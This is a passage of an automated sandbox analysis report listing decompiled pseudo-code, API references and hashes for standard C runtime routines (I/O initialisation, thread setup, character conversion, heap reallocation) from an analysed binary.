            • Opcode Fuzzy Hash: 06195edd405ba63af909aef867d45964980a6877ec7b6c94886de2f2bd17c0df
            • Instruction Fuzzy Hash: B6A0223008020CFBCF002F82FC8C8883F2CEB002A0B000020F80C0C030CB33ACA08AC2
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 86%
            			E002E38A8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
            				signed int _t82;
            				signed int _t86;
            				long _t90;
            				void* _t91;
            				signed int _t94;
            				signed int _t98;
            				signed int _t99;
            				signed char _t103;
            				signed int _t105;
            				intOrPtr _t106;
            				intOrPtr* _t109;
            				signed char _t111;
            				long _t119;
            				intOrPtr _t129;
            				signed int _t133;
            				void* _t135;
            				signed int _t138;
            				void** _t139;
            				signed int _t141;
            				signed int _t142;
            				signed int _t143;
            				signed int _t147;
            				signed int _t149;
            				void* _t150;
            				signed int _t154;
            				void* _t155;
            				void* _t156;
            
            				_push(0x64);
            				_push(0x2f2260);
            				E002E2400(__ebx, __edi, __esi);
            				E002E442F(0xb);
            				 *((intOrPtr*)(_t155 - 4)) = 0;
            				_push(0x40);
            				_t141 = 0x20;
            				_push(_t141);
            				_t82 = E002E4869();
            				_t133 = _t82;
            				 *(_t155 - 0x24) = _t133;
            				if(_t133 != 0) {
            					 *0x2f4848 = _t82;
            					 *0x2f50e4 = _t141;
            					while(1) {
            						__eflags = _t133 - 0x800 + _t82;
            						if(_t133 >= 0x800 + _t82) {
            							break;
            						}
            						 *((short*)(_t133 + 4)) = 0xa00;
            						 *_t133 =  *_t133 | 0xffffffff;
            						 *((intOrPtr*)(_t133 + 8)) = 0;
            						 *(_t133 + 0x24) =  *(_t133 + 0x24) & 0x00000080;
            						 *(_t133 + 0x24) =  *(_t133 + 0x24) & 0x0000007f;
            						 *((short*)(_t133 + 0x25)) = 0xa0a;
            						 *((intOrPtr*)(_t133 + 0x38)) = 0;
            						 *((char*)(_t133 + 0x34)) = 0;
            						_t133 = _t133 + 0x40;
            						 *(_t155 - 0x24) = _t133;
            						_t82 =  *0x2f4848; // 0x11b14b8
            					}
            					GetStartupInfoW(_t155 - 0x74);
            					__eflags =  *((short*)(_t155 - 0x42));
            					if( *((short*)(_t155 - 0x42)) == 0) {
            						L27:
            						_t129 = 0xfffffffe;
            						L28:
            						_t142 = 0;
            						__eflags = 0;
            						while(1) {
            							 *(_t155 - 0x2c) = _t142;
            							__eflags = _t142 - 3;
            							if(_t142 >= 3) {
            								break;
            							}
            							_t147 = (_t142 << 6) +  *0x2f4848;
            							 *(_t155 - 0x24) = _t147;
            							__eflags =  *_t147 - 0xffffffff;
            							if( *_t147 == 0xffffffff) {
            								L33:
            								 *(_t147 + 4) = 0x81;
            								__eflags = _t142;
            								if(_t142 != 0) {
            									_t65 = _t142 - 1; // -1
            									asm("sbb eax, eax");
            									_t90 =  ~_t65 + 0xfffffff5;
            									__eflags = _t90;
            								} else {
            									_t90 = 0xfffffff6;
            								}
            								_t91 = GetStdHandle(_t90);
            								 *(_t155 - 0x1c) = _t91;
            								__eflags = _t91 - 0xffffffff;
            								if(_t91 == 0xffffffff) {
            									L45:
            									 *(_t147 + 4) =  *(_t147 + 4) | 0x00000040;
            									 *_t147 = _t129;
            									_t94 =  *0x2f6100;
            									__eflags = _t94;
            									if(_t94 != 0) {
            										 *((intOrPtr*)( *((intOrPtr*)(_t94 + _t142 * 4)) + 0x10)) = _t129;
            									}
            									goto L47;
            								} else {
            									__eflags = _t91;
            									if(_t91 == 0) {
            										goto L45;
            									}
            									_t98 = GetFileType(_t91);
            									__eflags = _t98;
            									if(_t98 == 0) {
            										goto L45;
            									}
            									 *_t147 =  *(_t155 - 0x1c);
            									_t99 = _t98 & 0x000000ff;
            									__eflags = _t99 - 2;
            									if(_t99 != 2) {
            										__eflags = _t99 - 3;
            										if(_t99 != 3) {
            											L44:
            											_t71 = _t147 + 0xc; // -3098684
            											E002E40A2(_t71, 0xfa0, 0);
            											_t156 = _t156 + 0xc;
            											 *((intOrPtr*)(_t147 + 8)) =  *((intOrPtr*)(_t147 + 8)) + 1;
            											L47:
            											_t142 = _t142 + 1;
            											continue;
            										}
            										_t103 =  *(_t147 + 4) | 0x00000008;
            										__eflags = _t103;
            										L43:
            										 *(_t147 + 4) = _t103;
            										goto L44;
            									}
            									_t103 =  *(_t147 + 4) | 0x00000040;
            									goto L43;
            								}
            							}
            							__eflags =  *_t147 - _t129;
            							if( *_t147 == _t129) {
            								goto L33;
            							}
            							 *(_t147 + 4) =  *(_t147 + 4) | 0x00000080;
            							goto L47;
            						}
            						 *((intOrPtr*)(_t155 - 4)) = _t129;
            						E002E3B53();
            						_t86 = 0;
            						__eflags = 0;
            						L49:
            						return E002E2445(_t86);
            					}
            					_t105 =  *(_t155 - 0x40);
            					__eflags = _t105;
            					if(_t105 == 0) {
            						goto L27;
            					}
            					_t135 =  *_t105;
            					 *(_t155 - 0x1c) = _t135;
            					_t106 = _t105 + 4;
            					 *((intOrPtr*)(_t155 - 0x28)) = _t106;
            					 *(_t155 - 0x20) = _t106 + _t135;
            					__eflags = _t135 - 0x800;
            					if(_t135 >= 0x800) {
            						_t135 = 0x800;
            						 *(_t155 - 0x1c) = 0x800;
            					}
            					_t149 = 1;
            					__eflags = 1;
            					 *(_t155 - 0x30) = 1;
            					while(1) {
            						__eflags =  *0x2f50e4 - _t135; // 0x20
            						if(__eflags >= 0) {
            							break;
            						}
            						_t138 = E002E4869(_t141, 0x40);
            						 *(_t155 - 0x24) = _t138;
            						__eflags = _t138;
            						if(_t138 != 0) {
            							0x2f4848[_t149] = _t138;
            							 *0x2f50e4 =  *0x2f50e4 + _t141;
            							__eflags =  *0x2f50e4;
            							while(1) {
            								__eflags = _t138 - 0x800 + 0x2f4848[_t149];
            								if(_t138 >= 0x800 + 0x2f4848[_t149]) {
            									break;
            								}
            								 *((short*)(_t138 + 4)) = 0xa00;
            								 *_t138 =  *_t138 | 0xffffffff;
            								 *((intOrPtr*)(_t138 + 8)) = 0;
            								 *(_t138 + 0x24) =  *(_t138 + 0x24) & 0x00000080;
            								 *((short*)(_t138 + 0x25)) = 0xa0a;
            								 *((intOrPtr*)(_t138 + 0x38)) = 0;
            								 *((char*)(_t138 + 0x34)) = 0;
            								_t138 = _t138 + 0x40;
            								 *(_t155 - 0x24) = _t138;
            							}
            							_t149 = _t149 + 1;
            							 *(_t155 - 0x30) = _t149;
            							_t135 =  *(_t155 - 0x1c);
            							continue;
            						}
            						_t135 =  *0x2f50e4; // 0x20
            						 *(_t155 - 0x1c) = _t135;
            						break;
            					}
            					_t143 = 0;
            					 *(_t155 - 0x2c) = 0;
            					_t129 = 0xfffffffe;
            					_t109 =  *((intOrPtr*)(_t155 - 0x28));
            					_t139 =  *(_t155 - 0x20);
            					while(1) {
            						__eflags = _t143 - _t135;
            						if(_t143 >= _t135) {
            							goto L28;
            						}
            						_t150 =  *_t139;
            						__eflags = _t150 - 0xffffffff;
            						if(_t150 == 0xffffffff) {
            							L22:
            							_t143 = _t143 + 1;
            							 *(_t155 - 0x2c) = _t143;
            							_t109 =  *((intOrPtr*)(_t155 - 0x28)) + 1;
            							 *((intOrPtr*)(_t155 - 0x28)) = _t109;
            							_t139 =  &(_t139[1]);
            							 *(_t155 - 0x20) = _t139;
            							continue;
            						}
            						__eflags = _t150 - _t129;
            						if(_t150 == _t129) {
            							goto L22;
            						}
            						_t111 =  *_t109;
            						__eflags = _t111 & 0x00000001;
            						if((_t111 & 0x00000001) == 0) {
            							goto L22;
            						}
            						__eflags = _t111 & 0x00000008;
            						if((_t111 & 0x00000008) != 0) {
            							L20:
            							_t154 = ((_t143 & 0x0000001f) << 6) + 0x2f4848[_t143 >> 5];
            							 *(_t155 - 0x24) = _t154;
            							 *_t154 =  *_t139;
            							 *((char*)(_t154 + 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t155 - 0x28))));
            							_t37 = _t154 + 0xc; // 0xd
            							E002E40A2(_t37, 0xfa0, 0);
            							_t156 = _t156 + 0xc;
            							_t38 = _t154 + 8;
            							 *_t38 =  *(_t154 + 8) + 1;
            							__eflags =  *_t38;
            							_t139 =  *(_t155 - 0x20);
            							L21:
            							_t135 =  *(_t155 - 0x1c);
            							goto L22;
            						}
            						_t119 = GetFileType(_t150);
            						_t139 =  *(_t155 - 0x20);
            						__eflags = _t119;
            						if(_t119 == 0) {
            							goto L21;
            						}
            						goto L20;
            					}
            					goto L28;
            				}
            				_t86 = E002E2600(_t155, 0x2f3400, _t155 - 0x10, 0xfffffffe) | 0xffffffff;
            				goto L49;
            			}






























            0x002e38a8
            0x002e38aa
            0x002e38af
            0x002e38b6
            0x002e38be
            0x002e38c1
            0x002e38c5
            0x002e38c6
            0x002e38c7
            0x002e38ce
            0x002e38d0
            0x002e38d5
            0x002e38f2
            0x002e38f7
            0x002e38fd
            0x002e3902
            0x002e3904
            0x00000000
            0x00000000
            0x002e3906
            0x002e390c
            0x002e390f
            0x002e3912
            0x002e391b
            0x002e391e
            0x002e3924
            0x002e3927
            0x002e392a
            0x002e392d
            0x002e3930
            0x002e3930
            0x002e393b
            0x002e3941
            0x002e3946
            0x002e3a7b
            0x002e3a7d
            0x002e3a7e
            0x002e3a7e
            0x002e3a7e
            0x002e3a80
            0x002e3a80
            0x002e3a83
            0x002e3a86
            0x00000000
            0x00000000
            0x002e3a91
            0x002e3a97
            0x002e3a9a
            0x002e3a9d
            0x002e3ab1
            0x002e3ab1
            0x002e3ab5
            0x002e3ab7
            0x002e3abe
            0x002e3ac3
            0x002e3ac5
            0x002e3ac5
            0x002e3ab9
            0x002e3abb
            0x002e3abb
            0x002e3ac9
            0x002e3acf
            0x002e3ad2
            0x002e3ad5
            0x002e3b23
            0x002e3b29
            0x002e3b2c
            0x002e3b2e
            0x002e3b33
            0x002e3b35
            0x002e3b3a
            0x002e3b3a
            0x00000000
            0x002e3ad7
            0x002e3ad7
            0x002e3ad9
            0x00000000
            0x00000000
            0x002e3adc
            0x002e3ae2
            0x002e3ae4
            0x00000000
            0x00000000
            0x002e3ae9
            0x002e3aeb
            0x002e3af0
            0x002e3af3
            0x002e3afd
            0x002e3b00
            0x002e3b0b
            0x002e3b12
            0x002e3b16
            0x002e3b1b
            0x002e3b1e
            0x002e3b3d
            0x002e3b3d
            0x00000000
            0x002e3b3d
            0x002e3b06
            0x002e3b06
            0x002e3b08
            0x002e3b08
            0x00000000
            0x002e3b08
            0x002e3af9
            0x00000000
            0x002e3af9
            0x002e3ad5
            0x002e3a9f
            0x002e3aa1
            0x00000000
            0x00000000
            0x002e3aa9
            0x00000000
            0x002e3aa9
            0x002e3b43
            0x002e3b46
            0x002e3b4b
            0x002e3b4b
            0x002e3b4d
            0x002e3b52
            0x002e3b52
            0x002e394c
            0x002e394f
            0x002e3951
            0x00000000
            0x00000000
            0x002e3957
            0x002e3959
            0x002e395c
            0x002e395f
            0x002e3964
            0x002e396c
            0x002e396e
            0x002e3970
            0x002e3972
            0x002e3972
            0x002e3977
            0x002e3977
            0x002e3978
            0x002e397b
            0x002e397b
            0x002e3981
            0x00000000
            0x00000000
            0x002e398d
            0x002e398f
            0x002e3992
            0x002e3994
            0x002e3a2e
            0x002e3a35
            0x002e3a35
            0x002e3a3b
            0x002e3a47
            0x002e3a49
            0x00000000
            0x00000000
            0x002e3a4b
            0x002e3a51
            0x002e3a54
            0x002e3a57
            0x002e3a5b
            0x002e3a61
            0x002e3a64
            0x002e3a67
            0x002e3a6a
            0x002e3a6a
            0x002e3a6f
            0x002e3a70
            0x002e3a73
            0x00000000
            0x002e3a73
            0x002e399a
            0x002e39a0
            0x00000000
            0x002e39a0
            0x002e39a3
            0x002e39a5
            0x002e39aa
            0x002e39ab
            0x002e39ae
            0x002e39b1
            0x002e39b1
            0x002e39b3
            0x00000000
            0x00000000
            0x002e39b9
            0x002e39bb
            0x002e39be
            0x002e3a1b
            0x002e3a1b
            0x002e3a1c
            0x002e3a22
            0x002e3a23
            0x002e3a26
            0x002e3a29
            0x00000000
            0x002e3a29
            0x002e39c0
            0x002e39c2
            0x00000000
            0x00000000
            0x002e39c4
            0x002e39c6
            0x002e39c8
            0x00000000
            0x00000000
            0x002e39ca
            0x002e39cc
            0x002e39dc
            0x002e39e9
            0x002e39f0
            0x002e39f5
            0x002e39fc
            0x002e3a06
            0x002e3a0a
            0x002e3a0f
            0x002e3a12
            0x002e3a12
            0x002e3a12
            0x002e3a15
            0x002e3a18
            0x002e3a18
            0x00000000
            0x002e3a18
            0x002e39cf
            0x002e39d5
            0x002e39d8
            0x002e39da
            0x00000000
            0x00000000
            0x00000000
            0x002e39da
            0x00000000
            0x002e39b1
            0x002e38ea
            0x00000000

            APIs
            • __lock.LIBCMT ref: 002E38B6
              • Part of subcall function 002E442F: __mtinitlocknum.LIBCMT ref: 002E4441
              • Part of subcall function 002E442F: EnterCriticalSection.KERNEL32(00000000,?,002E37AB,0000000D), ref: 002E445A
            • __calloc_crt.LIBCMT ref: 002E38C7
              • Part of subcall function 002E4869: __calloc_impl.LIBCMT ref: 002E4878
            • @_EH4_CallFilterFunc@8.LIBCMT ref: 002E38E2
            • GetStartupInfoW.KERNEL32(?,002F2260,00000064,002E1654,002F2190,00000014), ref: 002E393B
            • __calloc_crt.LIBCMT ref: 002E3986
            • GetFileType.KERNEL32(00000001), ref: 002E39CF
            Memory Dump Source
            • Source File: 00000001.00000002.233540686.00000000002E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 002E0000, based on PE: true
            • Associated: 00000001.00000002.233535949.00000000002E0000.00000002.00000001.01000000.00000004.sdmpDownload File
            • Associated: 00000001.00000002.233550962.00000000002EE000.00000002.00000001.01000000.00000004.sdmpDownload File
            • Associated: 00000001.00000002.233556716.00000000002F3000.00000004.00000001.01000000.00000004.sdmpDownload File
            • Associated: 00000001.00000002.233561593.00000000002F7000.00000002.00000001.01000000.00000004.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_2e0000_miylwnpd.jbxd
            Similarity
            • API ID: __calloc_crt$CallCriticalEnterFileFilterFunc@8InfoSectionStartupType__calloc_impl__lock__mtinitlocknum
            • String ID:
            • API String ID: 2772871689-0
            • Opcode ID: b7755770e37b0876989e74e251f059eb9aa4baea6c393b94614c45bf20d225c9
            • Instruction ID: a7dad21f6c9170e6219eb00469ee690657e384d278d3e163592ec4732c201612
            • Opcode Fuzzy Hash: b7755770e37b0876989e74e251f059eb9aa4baea6c393b94614c45bf20d225c9
            • Instruction Fuzzy Hash: 398128719643868FCB10CF6AD8885ADBBF0AF09325FA4427DD0A6AB3D1C7749952CB50
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 91%
            			E002E3815(void* __ebx, void* __edi, void* __eflags) {
            				void* __esi;
            				void* _t3;
            				intOrPtr _t6;
            				long _t14;
            				long* _t27;
            
            				E002E1890(_t3);
            				if(E002E4560() != 0) {
            					_t6 = E002E4001(E002E35A6);
            					 *0x2f350c = _t6;
            					__eflags = _t6 - 0xffffffff;
            					if(_t6 == 0xffffffff) {
            						goto L1;
            					} else {
            						_t27 = E002E4869(1, 0x3bc);
            						__eflags = _t27;
            						if(_t27 == 0) {
            							L6:
            							E002E388B();
            							__eflags = 0;
            							return 0;
            						} else {
            							__eflags = E002E405D( *0x2f350c, _t27);
            							if(__eflags == 0) {
            								goto L6;
            							} else {
            								_push(0);
            								_push(_t27);
            								E002E3762(__ebx, __edi, _t27, __eflags);
            								_t14 = GetCurrentThreadId();
            								_t27[1] = _t27[1] | 0xffffffff;
            								 *_t27 = _t14;
            								__eflags = 1;
            								return 1;
            							}
            						}
            					}
            				} else {
            					L1:
            					E002E388B();
            					return 0;
            				}
            			}








            0x002e3815
            0x002e3821
            0x002e3830
            0x002e3835
            0x002e383b
            0x002e383e
            0x00000000
            0x002e3840
            0x002e384d
            0x002e3851
            0x002e3853
            0x002e3882
            0x002e3882
            0x002e3887
            0x002e388a
            0x002e3855
            0x002e3863
            0x002e3865
            0x00000000
            0x002e3867
            0x002e3867
            0x002e3869
            0x002e386a
            0x002e3871
            0x002e3877
            0x002e387b
            0x002e387f
            0x002e3881
            0x002e3881
            0x002e3865
            0x002e3853
            0x002e3823
            0x002e3823
            0x002e3823
            0x002e382a
            0x002e382a

            APIs
            • __init_pointers.LIBCMT ref: 002E3815
              • Part of subcall function 002E1890: RtlEncodePointer.NTDLL(00000000,?,002E381A,002E163A,002F2190,00000014), ref: 002E1893
              • Part of subcall function 002E1890: __initp_misc_winsig.LIBCMT ref: 002E18AE
              • Part of subcall function 002E1890: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 002E4117
              • Part of subcall function 002E1890: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 002E412B
              • Part of subcall function 002E1890: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 002E413E
              • Part of subcall function 002E1890: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 002E4151
              • Part of subcall function 002E1890: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 002E4164
              • Part of subcall function 002E1890: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 002E4177
              • Part of subcall function 002E1890: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 002E418A
              • Part of subcall function 002E1890: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 002E419D
              • Part of subcall function 002E1890: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 002E41B0
              • Part of subcall function 002E1890: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 002E41C3
              • Part of subcall function 002E1890: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 002E41D6
              • Part of subcall function 002E1890: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 002E41E9
              • Part of subcall function 002E1890: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 002E41FC
              • Part of subcall function 002E1890: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 002E420F
              • Part of subcall function 002E1890: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 002E4222
              • Part of subcall function 002E1890: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 002E4235
            • __mtinitlocks.LIBCMT ref: 002E381A
            • __mtterm.LIBCMT ref: 002E3823
              • Part of subcall function 002E388B: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,002E3828,002E163A,002F2190,00000014), ref: 002E447A
              • Part of subcall function 002E388B: _free.LIBCMT ref: 002E4481
              • Part of subcall function 002E388B: DeleteCriticalSection.KERNEL32(XK/,?,?,002E3828,002E163A,002F2190,00000014), ref: 002E44A3
            • __calloc_crt.LIBCMT ref: 002E3848
            • __initptd.LIBCMT ref: 002E386A
            • GetCurrentThreadId.KERNEL32 ref: 002E3871
            Memory Dump Source
            • Source File: 00000001.00000002.233540686.00000000002E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 002E0000, based on PE: true
            • Associated: 00000001.00000002.233535949.00000000002E0000.00000002.00000001.01000000.00000004.sdmpDownload File
            • Associated: 00000001.00000002.233550962.00000000002EE000.00000002.00000001.01000000.00000004.sdmpDownload File
            • Associated: 00000001.00000002.233556716.00000000002F3000.00000004.00000001.01000000.00000004.sdmpDownload File
            • Associated: 00000001.00000002.233561593.00000000002F7000.00000002.00000001.01000000.00000004.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_2e0000_miylwnpd.jbxd
            Similarity
            • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
            • String ID:
            • API String ID: 3567560977-0
            • Opcode ID: 11508f3cd49aff84df6365a2c67dc1844659fcf2c16c25d264f0d0840c582bfa
            • Instruction ID: bf84f721c7955ea1ad355a4e8517c30edcdb62bdfeea8a3d9a469144d1b6c757
            • Opcode Fuzzy Hash: 11508f3cd49aff84df6365a2c67dc1844659fcf2c16c25d264f0d0840c582bfa
            • Instruction Fuzzy Hash: DFF0C2721F82D259E228FA7B7C0A65A26848F42B71FE0463EF4149A0D2EB218A614990
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E002E91C6(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
            				char _v8;
            				intOrPtr _v12;
            				signed int _v20;
            				signed int _t35;
            				int _t38;
            				signed int _t41;
            				int _t42;
            				intOrPtr* _t44;
            				int _t47;
            				short* _t49;
            				intOrPtr _t50;
            				intOrPtr _t54;
            				int _t55;
            				signed int _t59;
            				char* _t62;
            
            				_t62 = _a8;
            				if(_t62 == 0) {
            					L5:
            					return 0;
            				}
            				_t50 = _a12;
            				if(_t50 == 0) {
            					goto L5;
            				}
            				if( *_t62 != 0) {
            					E002E4BFC( &_v20, _a16);
            					_t35 = _v20;
            					__eflags =  *(_t35 + 0xa8);
            					if( *(_t35 + 0xa8) != 0) {
            						_t38 = E002E917B( *_t62 & 0x000000ff,  &_v20);
            						__eflags = _t38;
            						if(_t38 == 0) {
            							__eflags = _a4;
            							_t41 = _v20;
            							_t59 = 1;
            							_t28 = _t41 + 4; // 0x840ffff8
            							_t42 = MultiByteToWideChar( *_t28, 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
            							__eflags = _t42;
            							if(_t42 != 0) {
            								L21:
            								__eflags = _v8;
            								if(_v8 != 0) {
            									_t54 = _v12;
            									_t31 = _t54 + 0x70;
            									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
            									__eflags =  *_t31;
            								}
            								return _t59;
            							}
            							L20:
            							_t44 = E002E1CC3();
            							_t59 = _t59 | 0xffffffff;
            							__eflags = _t59;
            							 *_t44 = 0x2a;
            							goto L21;
            						}
            						_t59 = _v20;
            						__eflags =  *(_t59 + 0x74) - 1;
            						if( *(_t59 + 0x74) <= 1) {
            							L15:
            							_t20 = _t59 + 0x74; // 0xe1c11fe1
            							__eflags = _t50 -  *_t20;
            							L16:
            							if(__eflags < 0) {
            								goto L20;
            							}
            							__eflags = _t62[1];
            							if(_t62[1] == 0) {
            								goto L20;
            							}
            							L18:
            							_t22 = _t59 + 0x74; // 0xe1c11fe1
            							_t59 =  *_t22;
            							goto L21;
            						}
            						_t12 = _t59 + 0x74; // 0xe1c11fe1
            						__eflags = _t50 -  *_t12;
            						if(__eflags < 0) {
            							goto L16;
            						}
            						__eflags = _a4;
            						_t17 = _t59 + 0x74; // 0xe1c11fe1
            						_t18 = _t59 + 4; // 0x840ffff8
            						_t47 = MultiByteToWideChar( *_t18, 9, _t62,  *_t17, _a4, 0 | _a4 != 0x00000000);
            						_t59 = _v20;
            						__eflags = _t47;
            						if(_t47 != 0) {
            							goto L18;
            						}
            						goto L15;
            					}
            					_t55 = _a4;
            					__eflags = _t55;
            					if(_t55 != 0) {
            						 *_t55 =  *_t62 & 0x000000ff;
            					}
            					_t59 = 1;
            					goto L21;
            				}
            				_t49 = _a4;
            				if(_t49 != 0) {
            					 *_t49 = 0;
            				}
            				goto L5;
            			}


















            0x002e91ce
            0x002e91d3
            0x002e91ed
            0x00000000
            0x002e91ed
            0x002e91d5
            0x002e91da
            0x00000000
            0x00000000
            0x002e91df
            0x002e91fc
            0x002e9201
            0x002e9204
            0x002e920b
            0x002e922a
            0x002e9231
            0x002e9233
            0x002e9277
            0x002e9283
            0x002e9286
            0x002e928b
            0x002e928e
            0x002e9294
            0x002e9296
            0x002e92a6
            0x002e92a6
            0x002e92aa
            0x002e92ac
            0x002e92af
            0x002e92af
            0x002e92af
            0x002e92af
            0x00000000
            0x002e92b5
            0x002e9298
            0x002e9298
            0x002e929d
            0x002e929d
            0x002e92a0
            0x00000000
            0x002e92a0
            0x002e9235
            0x002e9238
            0x002e923c
            0x002e9265
            0x002e9265
            0x002e9265
            0x002e9268
            0x002e9268
            0x00000000
            0x00000000
            0x002e926a
            0x002e926e
            0x00000000
            0x00000000
            0x002e9270
            0x002e9270
            0x002e9270
            0x00000000
            0x002e9270
            0x002e923e
            0x002e923e
            0x002e9241
            0x00000000
            0x00000000
            0x002e9245
            0x002e924f
            0x002e9255
            0x002e9258
            0x002e925e
            0x002e9261
            0x002e9263
            0x00000000
            0x00000000
            0x00000000
            0x002e9263
            0x002e920d
            0x002e9210
            0x002e9212
            0x002e9217
            0x002e9217
            0x002e921c
            0x00000000
            0x002e921c
            0x002e91e1
            0x002e91e6
            0x002e91ea
            0x002e91ea
            0x00000000

            APIs
            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 002E91FC
            • __isleadbyte_l.LIBCMT ref: 002E922A
            • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,E1C11FE1,00BFBBEF,00000000), ref: 002E9258
            • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,00BFBBEF,00000000), ref: 002E928E
            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.233540686.00000000002E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 002E0000, based on PE: true
            • Associated: 00000001.00000002.233535949.00000000002E0000.00000002.00000001.01000000.00000004.sdmpDownload File
            • Associated: 00000001.00000002.233550962.00000000002EE000.00000002.00000001.01000000.00000004.sdmpDownload File
            • Associated: 00000001.00000002.233556716.00000000002F3000.00000004.00000001.01000000.00000004.sdmpDownload File
            • Associated: 00000001.00000002.233561593.00000000002F7000.00000002.00000001.01000000.00000004.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_2e0000_miylwnpd.jbxd
            Similarity
            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
            • String ID: 8a.
            • API String ID: 3058430110-1963538963
            • Opcode ID: cf40efd99c17fcf527c63efdeeb14b0b808356da5f357ab414742cc023dd365b
            • Instruction ID: f5b20c9740967dbce8f833511fbbaa9d6ba780d29583f217b3ad6d92809fe537
            • Opcode Fuzzy Hash: cf40efd99c17fcf527c63efdeeb14b0b808356da5f357ab414742cc023dd365b
            • Instruction Fuzzy Hash: 1331D431590287BFDF218F76CC48BAA7BB9FF41310F55411AE9189B1A0D771D9A0DB50
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 95%
            			E002E7452(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
            				void* _t7;
            				void* _t8;
            				intOrPtr* _t9;
            				intOrPtr* _t12;
            				void* _t20;
            				long _t31;
            
            				if(_a4 != 0) {
            					_t31 = _a8;
            					if(_t31 != 0) {
            						_push(__ebx);
            						while(_t31 <= 0xffffffe0) {
            							if(_t31 == 0) {
            								_t31 = _t31 + 1;
            							}
            							_t7 = HeapReAlloc( *0x2f4834, 0, _a4, _t31);
            							_t20 = _t7;
            							if(_t20 != 0) {
            								L17:
            								_t8 = _t20;
            							} else {
            								if( *0x2f4830 == _t7) {
            									_t9 = E002E1CC3();
            									 *_t9 = E002E1CD6(GetLastError());
            									goto L17;
            								} else {
            									if(E002E1741(_t7, _t31) == 0) {
            										_t12 = E002E1CC3();
            										 *_t12 = E002E1CD6(GetLastError());
            										L12:
            										_t8 = 0;
            									} else {
            										continue;
            									}
            								}
            							}
            							goto L14;
            						}
            						E002E1741(_t6, _t31);
            						 *((intOrPtr*)(E002E1CC3())) = 0xc;
            						goto L12;
            					} else {
            						E002E4831(_a4);
            						_t8 = 0;
            					}
            					L14:
            					return _t8;
            				} else {
            					return E002E1149(__ebx, __edx, __edi, _a8);
            				}
            			}









            0x002e7459
            0x002e7467
            0x002e746c
            0x002e747b
            0x002e74ae
            0x002e7480
            0x002e7482
            0x002e7482
            0x002e748f
            0x002e7495
            0x002e7499
            0x002e74f9
            0x002e74f9
            0x002e749b
            0x002e74a1
            0x002e74e3
            0x002e74f7
            0x00000000
            0x002e74a3
            0x002e74ac
            0x002e74cb
            0x002e74df
            0x002e74c5
            0x002e74c5
            0x00000000
            0x00000000
            0x00000000
            0x002e74ac
            0x002e74a1
            0x00000000
            0x002e74c7
            0x002e74b4
            0x002e74bf
            0x00000000
            0x002e746e
            0x002e7471
            0x002e7477
            0x002e7477
            0x002e74c8
            0x002e74ca
            0x002e745b
            0x002e7465
            0x002e7465

            APIs
            • _malloc.LIBCMT ref: 002E745E
              • Part of subcall function 002E1149: __FF_MSGBANNER.LIBCMT ref: 002E1160
              • Part of subcall function 002E1149: __NMSG_WRITE.LIBCMT ref: 002E1167
              • Part of subcall function 002E1149: RtlAllocateHeap.NTDLL(01190000,00000000,00000001,00000000,00000000,00000000,?,002E48C7,00000000,00000000,00000000,00000000,?,002E44F9,00000018,002F2280), ref: 002E118C
            • _free.LIBCMT ref: 002E7471
            Memory Dump Source
            • Source File: 00000001.00000002.233540686.00000000002E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 002E0000, based on PE: true
            • Associated: 00000001.00000002.233535949.00000000002E0000.00000002.00000001.01000000.00000004.sdmpDownload File
            • Associated: 00000001.00000002.233550962.00000000002EE000.00000002.00000001.01000000.00000004.sdmpDownload File
            • Associated: 00000001.00000002.233556716.00000000002F3000.00000004.00000001.01000000.00000004.sdmpDownload File
            • Associated: 00000001.00000002.233561593.00000000002F7000.00000002.00000001.01000000.00000004.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_2e0000_miylwnpd.jbxd
            Similarity
            • API ID: AllocateHeap_free_malloc
            • String ID:
            • API String ID: 1020059152-0
            • Opcode ID: 8f846508ade2cf414f3cf3a194b0381ddbad9ead8115f0819d187d08aa691daa
            • Instruction ID: df1fd83d666b4ebe84eaff4dd8dcf996f29a8fbbe6628af6fd50e09ee781fb0f
